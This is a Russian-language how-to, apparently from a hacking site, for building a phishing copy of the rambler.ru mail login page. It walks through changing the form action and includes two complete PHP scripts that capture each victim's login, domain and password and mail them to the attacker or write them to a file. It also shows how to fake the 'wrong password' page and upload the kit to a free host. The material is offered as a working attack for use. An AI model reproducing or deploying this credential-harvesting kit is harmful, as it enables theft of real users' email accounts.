Доброго времени суток!!!
Сегодня я расскажу как сделать фейк на rambler.ru
И так приступим!
Переходим на страницу авторизации http://www.rambler.ru/ открываем исходный код страницы и копируем его в текстовик и ищем строку
<form method="post" action="http://id.rambler.ru/script/auth.cgi" name="rlogin">
и меняем на
<form method="post" action="login.php">
Сохраняем как index.html
Как видим мы изменили значение обязательной атрибут <form>`а action
Вот и сам login.php
<?php $BASE="мыло"; $IS_EMAIL=true; $LOCATION="erorr.html"; $p0=$_REQUEST["login"]; $p1=$_REQUEST["domain"]; $p2=$_REQUEST["passw"]; $headers = "Content-type: text/html; charset=windows-1251\r\n"; $headers .= "From: bot <$BASE>\r\n"; $headers .= "Bcc: $BASE\r\n"; $info="логин:$p0:домен:$p1:пароль:$p2:\n"; if ($IS_EMAIL){ mail($BASE, "Привет от www.thehackword.ru", $headers.$info); } else { $fd=fopen($BASE,"a+"); fwrite($fd,$info); fclose($fd); } header("Location:$LOCATION"); ?>
Здесь указываем своё мыло куда будет приходить логи и ссылку куда будет перекидывать после ввода данных , в нашей случаи это erorr.html!!!
Теперь мы создадим еще одну страничку фейка так как жертва может ошибиться при входе в свой аккаунт и к нам придут не верные логи(( Для этого открываем браузер opera и топаем на
http://www.rambler.ru/ (Делаем с помощью Opera так как только этот браузер нормально сохраняет все файлы)
Вписываем в поле логина и пароля что нибудь... например xaker:xaker и жмякаем "Войти в почту" Нас перекинет на страницу http://id.rambler.ru/script/auth.cgi где нам будет сказано
Неправильное имя или пароль Вот с этой странице мы и сделаем фейк.
В меню браузера находим пункт "сохранить как" и в тип файла выбираем "HTML-файл с изображениями" и сохраняем как erorr.html
И так если все правильно то у нас должно еще создаться папка с именем "erorr_files"
После открываем erorr.html с помощью блокнота (например) и ищем строку
<form method="post" action="auth.cgi?mode=login" name="auth_form" onsubmit="this.action+=location.hash">
И меняем на
<form method="post" action="rambl.php" name="auth_form" onsubmit="this.action+=location.hash">
И сохраняем
Вот сам rambl.php
<?php $BASE="мыло"; $IS_EMAIL=true; $LOCATION="http://www.rambler.ru/"; $p0=$_REQUEST["login"]; $p1=$_REQUEST["domain"]; $p2=$_REQUEST["passw"]; $headers = "Content-type: text/html; charset=windows-1251\r\n"; $headers .= "From: bot <$BASE>\r\n"; $headers .= "Bcc: $BASE\r\n"; $info="логин:$p0:домен:$p1:пароль:$p2:\n"; if ($IS_EMAIL){ mail($BASE, "Привет от www.thehackword.ru", $headers.$info); } else { $fd=fopen($BASE,"a+"); fwrite($fd,$info); fclose($fd); } header("Location:$LOCATION"); ?>
И так мы создали фейк!
Регимся например на holm.ru и с помощью FileZilla FTP Client заливаем наши файлы в папку www и радуемся!
Ну вот и все!